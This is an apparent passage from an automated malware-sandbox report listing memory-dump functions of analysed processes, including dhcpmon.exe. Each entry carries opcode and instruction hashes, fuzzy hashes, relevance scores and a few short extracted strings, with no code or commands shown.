Instruction ID: c9d9bb7351127f51d844025a3a74cf1910f097bdbe7b0c5f907c281a46f49182
Opcode Fuzzy Hash: 3e8364b2eee29745e210a909661ce46c8769c744a7c19f80569ff0db235d769f
Instruction Fuzzy Hash: 7C21EE76E01108AFDB05DFA6EC889DEBBBAFF8C310F15812AE505E7250DB345A419B90

Uniqueness

Uniqueness Score: -1.00%

Function 05190007, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31a2c897bb32f6ff485e511de37d032bb919d7abd3a7367b5432833380f40f4
Instruction ID: d1af969097edac41deb7108d1e877c6e18e31d2dbc19d57bee22abfe21dd30f3
Opcode Fuzzy Hash: b31a2c897bb32f6ff485e511de37d032bb919d7abd3a7367b5432833380f40f4
Instruction Fuzzy Hash: 8C31AE315093C48FC7469B34D8697593FB1EF86304F1948EAD081CF2A3EA6C9C49D752

Uniqueness

Uniqueness Score: -1.00%

Function 05190521, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88f80f6fdc60d83b73b130bc4def983726929dcc8a19f7d8c12acf42880343d6
Instruction ID: 2b09dc06b96547b9489ae474fadaf46d0acde3f4103b38089c44bb0e82db674a
Opcode Fuzzy Hash: 88f80f6fdc60d83b73b130bc4def983726929dcc8a19f7d8c12acf42880343d6
Instruction Fuzzy Hash: FD1129303002508BC7996B7DD56863E3AD7EFC6305B24047AE147CF7A2DE299D459785

Uniqueness

Uniqueness Score: -1.00%

Function 05190530, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ace4cf0b1d8364de84e3a55a980a5a7bfc72872cf0d1c5a06598ca4dd1ab0933
Instruction ID: e6e4e98b870ef8693ee9ffe7fd8cc749374b1a11d6796c32424b4d8b356202bb
Opcode Fuzzy Hash: ace4cf0b1d8364de84e3a55a980a5a7bfc72872cf0d1c5a06598ca4dd1ab0933
Instruction Fuzzy Hash: 761104303002108BC799AB7DD56862E3AD7AFC9305B24007AE50BCF7A6DE2A9D419786

Uniqueness

Uniqueness Score: -1.00%

Function 051920C0, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beed3f7711ac5dae520f486df4ba508df7a37d13a1a283d399cc5fcd14ea5234
Instruction ID: e7cb7acca24bed8d3a6b9244ba811da5c4f2cd3748400592c7b394f0f1df6763
Opcode Fuzzy Hash: beed3f7711ac5dae520f486df4ba508df7a37d13a1a283d399cc5fcd14ea5234
Instruction Fuzzy Hash: 1A11443AB00245ABCB28AB35EC887BA77A7EFC5311F0500B9D916C7296DB348C44D392

Uniqueness

Uniqueness Score: -1.00%

Function 05190630, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19aa1759ce43d6e925c84d5e8e2ad53d306e6d37614acb33a093d3fb9703ae39
Instruction ID: 9e6d4ba0b89f1d370541f7dba62bf5ff7dfbc67a7e8931e10b9c6052ccf6a4af
Opcode Fuzzy Hash: 19aa1759ce43d6e925c84d5e8e2ad53d306e6d37614acb33a093d3fb9703ae39
Instruction Fuzzy Hash: 9D01FC327041848FC749AB3A981C51C3FD7EBC562571940BDD146C73A6DF284D01D7D6

Uniqueness

Uniqueness Score: -1.00%

Function 051928D7, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb0288bf403623ab6e547a863255c5474469700023364a231d7df1c3d6f5f77
Instruction ID: 79eeacaebad9f5f987d1803e873e800620c31a63de7939a9e793cd33a980c98d
Opcode Fuzzy Hash: 6bb0288bf403623ab6e547a863255c5474469700023364a231d7df1c3d6f5f77
Instruction Fuzzy Hash: 9101A721A0D3C25FD70697755C24BAA3FA65FC3200F1944EED596CB2E3C9288805DB62

Uniqueness

Uniqueness Score: -1.00%

Function 05192350, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67607a4a3f11a786e63760c2dc23c48e9d82590b22de09136737fab7a5698267
Instruction ID: 6fad06f0de01d96a486a8fd6ac743a9a2d1d4037d69fc4d5c83fe3ea1ecf9aca
Opcode Fuzzy Hash: 67607a4a3f11a786e63760c2dc23c48e9d82590b22de09136737fab7a5698267
Instruction Fuzzy Hash: 7DF0FF317001946BCB94E778E8249AE37E7EBC96107140465D606CB3C0EE2EDD02D7E5

Uniqueness

Uniqueness Score: -1.00%

Function 051922D0, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74634e9a13d0106a4d102fec5cd2647f57ef86a97e679339382fc5a084ebb990
Instruction ID: 5a5b656ff038a3e35c7b0f29da116bfe14689c38952071be5967a0339d3ca638
Opcode Fuzzy Hash: 74634e9a13d0106a4d102fec5cd2647f57ef86a97e679339382fc5a084ebb990
Instruction Fuzzy Hash: 31F0C2317000248FC744ABBCD458BAE3BEAEF89715F1441BAE50ACB3A1DD759C41C790

Uniqueness

Uniqueness Score: -1.00%

Function 051928E8, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a72f1a6dd7c1710321a871c874135e40cc51376a951a3b36314a4484e45057f
Instruction ID: 175bd39a3b85d98f4bb8f1d353d47ada3fef72b15edabd42238c95bdd8a59f5d
Opcode Fuzzy Hash: 2a72f1a6dd7c1710321a871c874135e40cc51376a951a3b36314a4484e45057f
Instruction Fuzzy Hash: B4F0C8206093C25FD70653769C2476A3FAA9FC3610B1940AAE155CB2E3CD248C05EBB2

Uniqueness

Uniqueness Score: -1.00%

Function 05192360, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ed7e0751543adeec2e9d8405ad0fa48ee76773256643075845e5d7b569d734b
Instruction ID: afa7958c9c56d68fa6867571c9404571c9ef12a41125cd53be075be166db0b81
Opcode Fuzzy Hash: 5ed7e0751543adeec2e9d8405ad0fa48ee76773256643075845e5d7b569d734b
Instruction Fuzzy Hash: 20F090317001555BC658EB39E41486E37DBABC86503140575DA06DB3C0EE3EDD0197E5

Uniqueness

Uniqueness Score: -1.00%

Function 051922E0, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 590c883155aa3ae8a4a4daf0cbd8d57715d7d0f464c531af383abfbb61b44f35
Instruction ID: 1b66a4ad56479a935076353967916d083b4978dec4461a8d474902f3b6007abf
Opcode Fuzzy Hash: 590c883155aa3ae8a4a4daf0cbd8d57715d7d0f464c531af383abfbb61b44f35
Instruction Fuzzy Hash: D8F05E307001248FC744ABBCD458A6E3AEAEFC8755B2441AAE50ACB7A5DE75DC418791

Uniqueness

Uniqueness Score: -1.00%

Function 05192448, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa9edf56c815904863d45caef9ae56e1bfdb9d3bc0105475f69e3bd85052aa5
Instruction ID: bdd4eeda26396d722e665fa69b86830f96f4c677e14aa4a3de39e8f105066c02
Opcode Fuzzy Hash: daa9edf56c815904863d45caef9ae56e1bfdb9d3bc0105475f69e3bd85052aa5
Instruction Fuzzy Hash: 47F0A7323005489BC304EF69ECC598E7F9AEBC93217104479E90ADB310DE359C058760

Uniqueness

Uniqueness Score: -1.00%

Function 05190640, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 217e5675e348b61dfe916a90beec8d58a82bfa842e2878371085bed515cc7e02
Instruction ID: 67c3f952a56dafa895cb104da5c651598e9916fa29e9de750ea3ca2d2711ac3d
Opcode Fuzzy Hash: 217e5675e348b61dfe916a90beec8d58a82bfa842e2878371085bed515cc7e02
Instruction Fuzzy Hash: 52E02231B004948B8708AB3EA81C42D3BD7EFC8A253084039E60BC7361CF344C02A796

Uniqueness

Uniqueness Score: -1.00%

Function 05192458, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed18d8e5b333205bbcaf23d5eadfaa57af22e95dc7ab8c2624a302e4d697312
Instruction ID: ed8ad2b44717e1322420ba1052770173b4951f4f2f220d0d0962b5a3390dfab4
Opcode Fuzzy Hash: 8ed18d8e5b333205bbcaf23d5eadfaa57af22e95dc7ab8c2624a302e4d697312
Instruction Fuzzy Hash: EFE092323001489BC704EF69ECC888E7B9AEBC8221310843AA90AC7310DE719C0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 051924F1, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffa2385ab2b75078052c049becf4eeb21bb98ed0aafa66c548787cf59c13cb56
Instruction ID: 54f9178d6107ac4ae47eb14f45ab37a6ee566b47321a510352d56e90c0fe08b1
Opcode Fuzzy Hash: ffa2385ab2b75078052c049becf4eeb21bb98ed0aafa66c548787cf59c13cb56
Instruction Fuzzy Hash: 71E09A323002404BC34466BDE81075ABB9ECFCB328F1800BAA209CB392CD79A8419395

Uniqueness

Uniqueness Score: -1.00%

Function 05192500, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf636a9f88bb7b5ac868363f8bb126347938cf257ae26a35ef523c7ca2d127fe
Instruction ID: c9129f98e149f1e76ccf2b948ecd963141bcf1a498989f0c1cc6f599fe0b4f67
Opcode Fuzzy Hash: bf636a9f88bb7b5ac868363f8bb126347938cf257ae26a35ef523c7ca2d127fe
Instruction Fuzzy Hash: F3E012313002149BC75866ADE414A5F77DFDBCA325B14407BF509DB391CDBAAC4147E5

Uniqueness

Uniqueness Score: -1.00%

Function 051906C8, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a7c65d19b5d6f85133e22e331e1a7c0033fa50061af7bf763bcf1e112ce0a0
Instruction ID: b4d09e9ac6a3132c8292be2b6eb19ea11a67f708f06322a0e0e5dbb7105992e2
Opcode Fuzzy Hash: 85a7c65d19b5d6f85133e22e331e1a7c0033fa50061af7bf763bcf1e112ce0a0
Instruction Fuzzy Hash: 1BD0A7B2144784AFD300C7209C45BAA77ECC746710F2041A97962C61D1FB30A8149322

Uniqueness

Uniqueness Score: -1.00%

Function 05190251, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0072e42cfe365e6cb9a1600788f9c4d3c6f825aca00814869d7594adc62f29f2
Instruction ID: 4092a366dc82d6d65ad581070f6a9f9f8a874a97028b683172f0a9bb0874a10d
Opcode Fuzzy Hash: 0072e42cfe365e6cb9a1600788f9c4d3c6f825aca00814869d7594adc62f29f2
Instruction Fuzzy Hash: 68D0C936B000108FDF1496ADE8085ECBBA2AFC4225B21107AD60ADB651EA2189598601

Uniqueness

Uniqueness Score: -1.00%

Function 05190130, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34feaa6225930c61f42a798f9a22f2d26d2f419375f688a5e619daa060d6cb9a
Instruction ID: 9e20535c48d436ed8cc033d949c9a3ba6a7b4f92579ab26477f853c385e4934a
Opcode Fuzzy Hash: 34feaa6225930c61f42a798f9a22f2d26d2f419375f688a5e619daa060d6cb9a
Instruction Fuzzy Hash: 9BC08C3074460806DE001AF8A88C326328C9780604F00047AA40ECB140E929D8804240

Uniqueness

Uniqueness Score: -1.00%

Function 05192428, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.228367660.0000000005190000.00000040.00000001.sdmp, Offset: 05190000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95140d5023b199c14bba64cfbd101d08d22edb4478a4a88dcc85c37b21ddc8e
Instruction ID: 7eab1cbaa299f517969fef93130d8a0513e4fcbf3fa08761c40075083e2849ff
Opcode Fuzzy Hash: c95140d5023b199c14bba64cfbd101d08d22edb4478a4a88dcc85c37b21ddc8e
Instruction Fuzzy Hash: F1C012B0414205EFC740EF28ED4586A7BF0FA80605F84C92CE489C2110F270551CCB52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: dhcpmon.exe PID: 5972 Parent PID: 528 dhcpmon.exeCOMMON

Executed Functions

Function 00F21468, Relevance: 1.6, Strings: 1, Instructions: 364COMMON

Download Yara Rule

Strings

", xrefs: 00F2152A

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 2a0fe5e9765c33bd15af0007d3fa5510479933d487c9af1ff3a7f3287889ccb8
Instruction ID: 8468b1a901339c8e3d5ea53d0b6ac11f8d1d0390444aa5de2685f988db80fc1e
Opcode Fuzzy Hash: 2a0fe5e9765c33bd15af0007d3fa5510479933d487c9af1ff3a7f3287889ccb8
Instruction Fuzzy Hash: 95D1D135A046699FCB01CF98D880BAEBBF1FF99310F158166E815EB291C730DD41DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00F22068, Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 00F220B0

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID: :@Dr
API String ID: 0-3830894600
Opcode ID: f69d5db549d129211d00106f5f9f47a0ce13789e455db05df39f770706f74c80
Instruction ID: 9774d9547140686c847ad889ec996185d820022a27d299d29f07b61866858032
Opcode Fuzzy Hash: f69d5db549d129211d00106f5f9f47a0ce13789e455db05df39f770706f74c80
Instruction Fuzzy Hash: 8871DF30B04220EFD764EB69E854F2ABBE1AF84320F11846AE956CB6D1CB31EC41DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00F21860, Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

</kr, xrefs: 00F218BC

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID: </kr
API String ID: 0-2427075492
Opcode ID: be8c1a6ffebbbfceb2f442184ac42fe4b903cb4e762adf370eb149b748ba2813
Instruction ID: 401b236070cbf6e2ae7294c1a9032bd55705166804dbd4eab5b5d2f951fc1030
Opcode Fuzzy Hash: be8c1a6ffebbbfceb2f442184ac42fe4b903cb4e762adf370eb149b748ba2813
Instruction Fuzzy Hash: 4971DB307042558FDB05DF28D894BAE7BE6FF85310F0584AAE815CB2A2DB30ED85DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00F206F7, Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

</kr, xrefs: 00F20924

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID: </kr
API String ID: 0-2427075492
Opcode ID: 91b93edf76dcd396db6b5db1d96c67fa31c29b4d3063d58410f59b2adfc3748c
Instruction ID: 555bf81c7c37ae472fe638dae7ac4ec4a793d1b664e8eab9d66765bf8a457a95
Opcode Fuzzy Hash: 91b93edf76dcd396db6b5db1d96c67fa31c29b4d3063d58410f59b2adfc3748c
Instruction Fuzzy Hash: B651C436B041649FDB14DF68D99076EBBF2EF88310F208169E546DB392DB349C81DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F20150, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 00F201A7

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID: :@Dr
API String ID: 0-3830894600
Opcode ID: b5651e190cdd7e256a28187266fa2fd3d705ecbbb10887c2ed0cf284d424f66d
Instruction ID: af6f87d0db8c1414f1698d9738535558504f8f988ab59d76481da202757ff055
Opcode Fuzzy Hash: b5651e190cdd7e256a28187266fa2fd3d705ecbbb10887c2ed0cf284d424f66d
Instruction Fuzzy Hash: 1A211D76E15118AFDB05DFAAED449DEBBBAFF88310B14812BE505E6260EB305E019B50

Uniqueness

Uniqueness Score: -1.00%

Function 00F20160, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 00F201A7

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID: :@Dr
API String ID: 0-3830894600
Opcode ID: b76b88f63f29e67ee9a40ecc8c0dee4f64c8d764abd0d0a5dd67301280e6f67d
Instruction ID: c60beddd44ea0c1ae9c0ebde8170eaae64d8d5374e7f9988cf6d519f42ee4300
Opcode Fuzzy Hash: b76b88f63f29e67ee9a40ecc8c0dee4f64c8d764abd0d0a5dd67301280e6f67d
Instruction Fuzzy Hash: 69212176E14118ABDB15DFAAEC449DEBBFAEF8C310F148127E505E7220EE305E019B90

Uniqueness

Uniqueness Score: -1.00%

Function 027E025D, Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228234633.00000000027E0000.00000040.00000040.sdmp, Offset: 027E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5ced6358d1d038fd9ac6e0012f359074329cd4f39426e5f94590cb2e3156c0c
Instruction ID: 6f9f509a270c6fa06ba1cfabbaa08ed48c7e15a3f056029dd393868ff2ea47dc
Opcode Fuzzy Hash: c5ced6358d1d038fd9ac6e0012f359074329cd4f39426e5f94590cb2e3156c0c
Instruction Fuzzy Hash: FA21AC6254E7C18FD7138B359C64191BFB09F47221B0E84EBC885CF5A3E26C580ACB72

Uniqueness

Uniqueness Score: -1.00%

Function 00F21238, Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06216291b3581f8753bbca5a9c064387ee7326dc856e9e46c3461ede8b03f2
Instruction ID: c982032cd9b1d9cb11d216d7d6b8be65233ddaaa7516125d0c8f164258b75c7b
Opcode Fuzzy Hash: 5d06216291b3581f8753bbca5a9c064387ee7326dc856e9e46c3461ede8b03f2
Instruction Fuzzy Hash: 90518431B00228DFDB15EFA5D854BAEBBB6FF99310F208525E902D3294DB709D41EB94

Uniqueness

Uniqueness Score: -1.00%

Function 00F21A98, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 771adb529bff69c162d3801ac9066448d93672d84549bdeef426552e95b97fdb
Instruction ID: bf6f7fa27275e4b12a814ea5e6ce2ba5cb211f831c29fde24b05c63278dae8b7
Opcode Fuzzy Hash: 771adb529bff69c162d3801ac9066448d93672d84549bdeef426552e95b97fdb
Instruction Fuzzy Hash: 5151BF347142158FCB04AB78E8187AE3BE7BFC8311F15806AE806C73A5DE759D45EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F20014, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf22df8d76b4f2fb49fdc8fd08659cce8e91324e24329ab63bd7aaa19a27cd76
Instruction ID: 5f6cd7da115d2437375d7e3ef3c27821dc556824414d0cdef17f7296d20858b6
Opcode Fuzzy Hash: cf22df8d76b4f2fb49fdc8fd08659cce8e91324e24329ab63bd7aaa19a27cd76
Instruction Fuzzy Hash: AE317E6550E3C18FD7039B349C696197FB0AF53204F5A88DBD081CF1A7DA684C49DB63

Uniqueness

Uniqueness Score: -1.00%

Function 00F20521, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2cc5d412af52826e994a9ccbd7c832ee54b5df1026aeec21aa447b55f436ae
Instruction ID: 1d4c8ccf2aa31fc2294350a1578608ea98a5d0dd6ec63ae958e1a0a4976e8da7
Opcode Fuzzy Hash: ab2cc5d412af52826e994a9ccbd7c832ee54b5df1026aeec21aa447b55f436ae
Instruction Fuzzy Hash: 60212C317012508FC799BB3CD56962E3AE3EFC6315B1440BAE406CF7A6DE398C429B85

Uniqueness

Uniqueness Score: -1.00%

Function 00F20530, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7f1a74fc8ecf9f788f0764cb7a71037773bee9c2e422896e168c2df0352c887
Instruction ID: 599c1edfd1d6db20ebd9c8e28e1bbd1d139098a190acf05268f23efe086ea6a1
Opcode Fuzzy Hash: a7f1a74fc8ecf9f788f0764cb7a71037773bee9c2e422896e168c2df0352c887
Instruction Fuzzy Hash: 0F1119317002108BC759BB7DD068A3E3AD7EFC6305B14007AE406CF7A6DE29DC419B86

Uniqueness

Uniqueness Score: -1.00%

Function 00F20697, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f7b0459cb977c6291b851dc60b9e42e38cd03c042188d48935c398384cf485d
Instruction ID: ebbc7edd9f812b4c15f0166b2dc8ac91385e8bed4cbe4fb8d4447127dc9cc82c
Opcode Fuzzy Hash: 7f7b0459cb977c6291b851dc60b9e42e38cd03c042188d48935c398384cf485d
Instruction Fuzzy Hash: C811B93631C6908FC716AB7CA8682993FE29FC622171A40EBD546CB2A7DE254C07D752

Uniqueness

Uniqueness Score: -1.00%

Function 00F219C0, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 521c80109ef78f8836fe6c470378dc1a6b959d1c838548e53f272ede25db0aba
Instruction ID: efd577fc41f5553f3c7138514dc7743a949c314a1912939d016e5c6155cbfe52
Opcode Fuzzy Hash: 521c80109ef78f8836fe6c470378dc1a6b959d1c838548e53f272ede25db0aba
Instruction Fuzzy Hash: 0F116A347146118FEB19AB2DEC1872F76AEABD8750F14402AE906C73E4DF748D02DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00F20630, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3b4f40fce108e6bf3112126599b13c245332c34e01cbb95afa40d8c33a9163
Instruction ID: fbeac83a699641ba6843d8ca1b77a1e8c52b56e246db627e5e8799f8634e356c
Opcode Fuzzy Hash: 6b3b4f40fce108e6bf3112126599b13c245332c34e01cbb95afa40d8c33a9163
Instruction Fuzzy Hash: 7F0184317085604FC715BB3C942866E3B93DFC571171980BBE506CB7A6CF294D029746

Uniqueness

Uniqueness Score: -1.00%

Function 00F21AC8, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a49495e890bc9f2996d63be9e1f743543c69a338efa8a5aecc7e4fe680a3d4
Instruction ID: c05e0d06f954bbd1c0b08802c62b3621ef02c1e0c9eee91d7eed144a858e96bb
Opcode Fuzzy Hash: c3a49495e890bc9f2996d63be9e1f743543c69a338efa8a5aecc7e4fe680a3d4
Instruction Fuzzy Hash: 1101283AB442248BC724AB79FC057BA33E6FBD4321F05413AE806C7254DB758D44E790

Uniqueness

Uniqueness Score: -1.00%

Function 00F222D0, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0dbbe7984f5f923dc932f53e8deef03b1bbc245b49b874af6f74de70d42876b
Instruction ID: 352f7b03b93865a970b3c513e1d79f5c6207710697a3d8058255cb8e183c5d93
Opcode Fuzzy Hash: e0dbbe7984f5f923dc932f53e8deef03b1bbc245b49b874af6f74de70d42876b
Instruction Fuzzy Hash: 3A01A270A0D3C15FDB0647795825B5A7FB68FD7600B2980EBE485CB293C9788D0AC762

Uniqueness

Uniqueness Score: -1.00%

Function 027E05CF, Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228234633.00000000027E0000.00000040.00000040.sdmp, Offset: 027E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad9e051c9a095d8ee5aabc617a84a51034f44fe483022dcae9afee22d5a690cf
Instruction ID: 8159684eed5d0eb380b455302872a89b60d486e50df6f6c2637e432fa56daeb9
Opcode Fuzzy Hash: ad9e051c9a095d8ee5aabc617a84a51034f44fe483022dcae9afee22d5a690cf
Instruction Fuzzy Hash: 6A01DB715097805FD7128B16EC51862FFB8DF86620708C4DFED89CB613D125A904CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00F222E0, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d619bd68ca63fc5e12353eede4b5abf05dea8203d028e172334cd165413ba4
Instruction ID: fa5ac1ee08e623b2ff9b4decda47d52e60aaed6686d1b1539d9391af8baeca7e
Opcode Fuzzy Hash: e5d619bd68ca63fc5e12353eede4b5abf05dea8203d028e172334cd165413ba4
Instruction Fuzzy Hash: 19F0C8306093816FD7065779882575F7FBA9FC6610F1980EAE545CB393CD748C0AD762

Uniqueness

Uniqueness Score: -1.00%

Function 00F21D4B, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c94811591ae42397a22c5095016dc21862842b6a9d818370c60c394f21da1bf
Instruction ID: 43593747cea559287087bb5f5288fc9764eb3a8a42fc322ce78c82ca8f3a2a57
Opcode Fuzzy Hash: 5c94811591ae42397a22c5095016dc21862842b6a9d818370c60c394f21da1bf
Instruction Fuzzy Hash: 65F028357051924FC708F779D42077D3BD76FC921032405A9D402CB394DE24CD06DB96

Uniqueness

